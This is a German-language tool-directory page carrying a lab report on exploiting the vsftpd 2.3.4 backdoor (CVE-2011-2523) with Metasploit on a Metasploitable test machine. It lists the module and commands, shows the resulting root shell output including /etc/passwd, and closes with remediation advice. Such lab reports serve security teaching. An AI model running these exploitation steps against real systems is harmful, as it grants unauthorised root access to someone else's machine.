Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
vsftpd-234-vuln-report — Schwachstellenbewertung und Ausnutzung von vsftpd 2.3.4 (CVE-2011-2523) mit Metasploit. Vollständiger Bericht und Nachweis des Root-Zugriffs enthalten. | Kitploit
Tools/GitHubGitHub/vedpakhare/vsftpd-234-vuln-report
Exploit-FrameworksSchwachstellenanalyseExploitationPenetrationstestsLernen & BildungPayload-Entwicklung
GitHubvedpakhare/vsftpd-234-vuln-report

vsftpd-234-vuln-report

Schwachstellenbewertung und Ausnutzung von vsftpd 2.3.4 (CVE-2011-2523) mit Metasploit. Vollständiger Bericht und Nachweis des Root-Zugriffs enthalten.

Repository anzeigenWebseite
21vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

💥 vsftpd 2.3.4 Backdoor-Exploit-Bericht

Ausnutzung einer bekannten Schwachstelle in vsftpd 2.3.4 mit Metasploit.

📌 Zielinformationen

  • Ziel-IP: 192.168.150.133
  • Dienst: FTP
  • Angreifbare Version: vsftpd 2.3.4
  • Exploit-Modul: exploit/unix/ftp/vsftpd_234_backdoor
  • Payload: Command Shell (TCP)

🔍 Schwachstellenübersicht

vsftpd 2.3.4 enthält eine bösartige Hintertür, die eine Befehlsshell auf Port 6200 öffnet, wenn ein speziell gestalteter Benutzername (endend auf :)) empfangen wird.

CVE: CVE-2011-2523


🚀 Ausnutzungsschritte

root@kitploit:~
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.150.133
run

💥 Shell-Zugriff erlangt:

root@kitploit:~
whoami
> root

id
> uid=0(root) gid=0(root)

hostname
> metasploitable

uname -a
> Linux metasploitable 2.6.24-16-server #1 SMP ...

cat /etc/passwd
> root:x:0:0:root:/root:/bin/bash
  daemon:x:1:1:daemon:/usr/sbin:/bin/sh
  ...

🔐 Auswirkungen

Root-Shell-Zugriff gibt dem Angreifer vollständige Kontrolle über das Zielsystem — einschließlich Privilegieneskalation, lateraler Bewegung, Datenerfassung und dauerhaftem Zugriff.


✅ Empfehlung

  • Verwenden Sie vsftpd 2.3.4 NICHT.
  • Aktualisieren Sie auf eine sichere, unterstützte Version.
  • Beschränken Sie externen Zugriff auf FTP.
  • Überwachen Sie verdächtigen Datenverkehr auf Port 6200.

📄 Bericht

📝 Vollständiger PDF-Bericht in diesem Repository: vsftpd-exploit-report.pdf


📚 Referenzen

  • Rapid7 Modul-Info
  • CVE-2011-2523 - NVD

👨‍💻 Autor

Erstellt mit 🔥 von vedpakhare

Tool herunterladen